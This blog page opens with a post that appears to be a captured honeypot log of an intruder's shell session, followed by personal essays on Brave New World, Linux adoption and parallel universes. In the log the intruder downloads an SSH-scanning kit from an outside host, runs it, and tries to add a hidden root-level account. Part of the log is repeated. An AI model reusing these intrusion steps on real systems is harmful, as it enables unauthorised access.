Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: serdzan
Full Name []: serdzan abdi
Room Number []: 1
Work Phone []: /
Home Phone []: /
Mobile Phone []: /
Country []: /
City []: /
Language []: /
Favorite movie []: /
Other []: /
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `user’ …
Deleting group `user’ (1001) …
Deleting home directory `/home/user’ …
Try again? [Y/n] n
www:~# adduser
adduser: Only one or two names allowed.
www:~# adduser serdzan
Adding user `serdzan’ …
Adding new group `serdzan’ (1001) …
Adding new user `serdzan’ (1001) with group `serdzan’ …
Creating home directory `/home/serdzan’ …
Copying files from `/etc/skel’ …
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: hi
Full Name []: hhi
Room Number []: 2
Work Phone []: /
Home Phone []: +38970554214
Mobile Phone []: +35897052555
Country []: bulgaria
City []: sofia
Language []: english
Favorite movie []: 2012
Other []: noting
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `serdzan’ …
Deleting group `serdzan’ (1001) …
Deleting home directory `/home/serdzan’ …
Try again? [Y/n] n
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
–2010-04-08 13:39:02–  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar

100%[======================================>] 1,642,769    143K/s  eta 0s

2010-04-08 13:39:13 (143 KB/s) – `gosh.tgz.tar’ saved [1642769/1642769]
www:~# tar -zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a
www:~# cd gosh
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-“-“-
O RLY?
___
{o,o}
|)__)
-“-“-
O RLY? y
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-“-“-
O RLY? yes
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh# ./go
bash: ./go: command not found
www:/root/gosh# ./go.sh
___
{o,o}
|)__)
-“-“-
O RLY? no
___
{o,o}
|)__)
-“-“-
O RLY? no
___
{o,o}
|)__)
-“-“-
O RLY? k
___
{o,o}
|)__)
-“-“-
O RLY? y
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh#

www:~# w
13:27:54 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              [email protected] IDLE   JCPU   PCPU WHAT
root     pts/0    77.28.252.122     13:27    0.00s  0.00s  0.00s w
www:~# ls
www:~# uptime
13:28:00 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01
www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# passwd
Enter new UNIX password:
Retype new UNIX password:
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# passwd
Enter new UNIX password:
Retype new UNIX password:
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
Adding user `user’ …
Adding new group `user’ (1001) …
Adding new user `user’ (1001) with group `user’ …
Creating home directory `/home/user’ …
Copying files from `/etc/skel’ …
Password:
Password again:

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: serdzan
Full Name []: serdzan abdi
Room Number []: 1
Work Phone []: /
Home Phone []: /
Mobile Phone []: /
Country []: /
City []: /
Language []: /
Favorite movie []: /
Other []: /
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `user’ …
Deleting group `user’ (1001) …
Deleting home directory `/home/user’ …
Try again? [Y/n] n
www:~# adduser
adduser: Only one or two names allowed.
www:~# adduser serdzan
Adding user `serdzan’ …
Adding new group `serdzan’ (1001) …
Adding new user `serdzan’ (1001) with group `serdzan’ …
Creating home directory `/home/serdzan’ …
Copying files from `/etc/skel’ …
Password:
Password again:

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: hi
Full Name []: hhi
Room Number []: 2
Work Phone []: /
Home Phone []: +38970554214
Mobile Phone []: +35897052555
Country []: bulgaria
City []: sofia
Language []: english
Favorite movie []: 2012
Other []: noting
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `serdzan’ …
Deleting group `serdzan’ (1001) …
Deleting home directory `/home/serdzan’ …
Try again? [Y/n] n
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
–2010-04-08 13:39:02–  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar

100%[======================================>] 1,642,769    143K/s  eta 0s

2010-04-08 13:39:13 (143 KB/s) – `gosh.tgz.tar’ saved [1642769/1642769]
www:~# tar -zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a
www:~# cd gosh
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-“-“-
O RLY?
___
{o,o}
|)__)
-“-“-
O RLY? y
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-“-“-
O RLY? yes
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh# ./go
bash: ./go: command not found
www:/root/gosh# ./go.sh
___
{o,o}
|)__)
-“-“-
O RLY? no
___
{o,o}
|)__)
-“-“-
O RLY? no
___
{o,o}
|)__)
-“-“-
O RLY? k
___
{o,o}
|)__)
-“-“-
O RLY? y
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh#

Written by sequel7

April 8th, 2010 at 2:49 pm

Posted in Hacking

Protected: Engraven

without comments

This content is password protected. To view it please enter your password below:

Written by sequel7

April 7th, 2010 at 10:44 am

Posted in Poetry

Another exercise in Thought

with one comment

So I’ve been reading Brave New World, about half way through right now. It’s interesting so far, fairly good, not really fantastic. It’s neat that the guy predicted so much of the mindset of so many of today’s people so long ago, but it’s not really very useful. That leaves only the story as a reason to read the book, and again, so far it’s fairly good but not all that epic. Anyway, none of that is the point.

One of the main ideas of the book is that mankind has organized itself into a rigid society, where each member is a tiny part of the greater whole. No one single person is really very important, or even truly understands the rest of the system, he only does his part and doesn’t ask questions. Of course, this would be a disturbing world to live in, yada yada yada. The point is that the entire planet has really formed itself into a single greater organism, much as our own cells all work together mindlessly to form the greater organism that is a human being.

Now my thought is this: Imagine if the greater organism that is Earth in the book were to send colonists to settle another planet. It would look much like a human cell dividing to form another cell. Now imagine this happening until there were so many colonized worlds formed into their own planet sized organisms, that they themselves began to form into a greater organism, perhaps encompassing a galaxy. And then what if that galactic organism began to reproduce itself and repeat the cycle again? Can you imagine what that would look like? Then think of it in reverse as well. We have no awareness of our blood cells as individual cells, but imagine if they themselves had once been the largest organism that had existed.

Just something I found to be a rather interesting chain of thought.

PS: I played Left 4 Dead 2 (never played the first) and Aliens vs Predator (since the new one came out) over the weekend. Zomg, I have been missing out. I also discovered that I am amazing as an alien. Furthermore, Just Cause 2 apparently came out while I wasn’t looking, so I played a few hours of it too. You have got to check this game out, it’s like a beautiful combination of GTA’s gameplay and sandbox with a bit of Spiderman’s powers on the side. Just ignore the god awful voice acting.

Written by sequel7

March 29th, 2010 at 3:47 pm

Why Linux isn’t taking over the desktop, really.

with one comment

Every year, we have a thousand different websites claiming that this time it really is the Year of the Linux Desktop. Every year Fedora and Ubuntu put out two full major releases, often with big improvements to their distribution, not to mention all the other distributions that I don’t care enough about to know their release schedule. Linux, in its better forms, has gotten to the point of being at least as user friendly as Windows, and certainly lighter on your machine. It still has its problems in its own areas, but Windows certainly has more than its own share of user-unfriendliness. So why hasn’t Linux taken a larger hold on the desktop? I believe the answer to that question lies with the Linux users, and their friends and family.

Consider this. All of us either know or are that “Computer Guy” that a dozen or more friends and family members have on speed dial to call up and ask the silliest questions about what they’ve broken on their Windows box this week. It’s an accepted way of life, and most of us don’t really mind that much. Most of those Computer Guys actually started as one of those friends or family members, and in the process of bugging a Computer Guy learned enough to become one themselves.

The problem is that Linux Computer Guys know that the pool of other Linux Computer Guys is much smaller than the pool of Windows Computer Guys. We know that the moment we start really teaching people we know to use Linux, every single person we teach is going to ask us every single one of their questions. As it stands, if someone can’t get one Windows Guy to help them, they can just call their backup Windows Guy (and don’t act like you don’t have a mental hierarchy, we know better). On the other hand, most people don’t even know one Linux Guy, much less two or three.

Now as I said earlier, I don’t think there would really be very many, if any, more issues with any given person using Linux instead of Windows, the problem is that would be a great many more persons calling their given Linux guy with their issues. Not many of us actually have the time or the patience to give out that kind of free labor, so not many of us really try to get people to use Linux. We talk a big game on forums, IRC, and amongst each other, but that rubber never hits the proverbial road. It can’t, unless someone figures out how to turn being The Computer Guy into a full time paying job. Friends and family tend to balk at the concept of paying for labor, which is okay when we can just pass them on to the next Guy when we’re busy, but that only works when there is a next Guy.

I honestly believe that’s the real problem. Thoughts on the solution?

Written by sequel7

February 2nd, 2010 at 8:53 am

Posted in Linux

Protected: Hark

without comments

This content is password protected. To view it please enter your password below:

Written by sequel7

January 31st, 2010 at 1:52 pm

Posted in Poetry

Exercise in Thought

with 3 comments

So imagine for me if you will, that there actually exist an infinite number of parallel universes.

Wikipedia has a somewhat less than perfectly clear definition of the term ‘parallel universe’, but I’ll explain the basics for anyone who isn’t familiar. Basically the idea is that there are an infinite number of alternate realities, that have branched in an infinite number of ways since the beginning of time. Every single thing that could ever have happened differently in our universe, actually has happened in a parallel universe. The alternate realities range from anything as similar to this one as a reality where you ate something different for breakfast this morning, to a reality where you never existed, due to an ancient ancestor of yours having died before having children. Again, the idea is that there is an infinite number of ways the universe could have played out, and every such possibility exists in a universe somewhere.

Okay, so now that we’ve made that assumption for the sake of this exercise in thought, we can move on.

I was thinking to myself this afternoon, and I realized what alternate universe I would want to live in. Somewhere, in some universe, due to the infinite number of events playing out, there would be a universe in which an entire physics system is false. Somewhere, there would be a bunch of people who believe in something like magic, or the force, because every time they point a magic wand or wave their hands, something spontaneously combusts. In reality, it would be a series of impossible coincidences, but because of the infinite possible universes, there would have to be at least one universe where something coincidentally exploded every single time someone pointed a stick at it.

That universe would be awesome.

Written by sequel7

November 21st, 2009 at 4:20 pm

Posted in Random Thoughts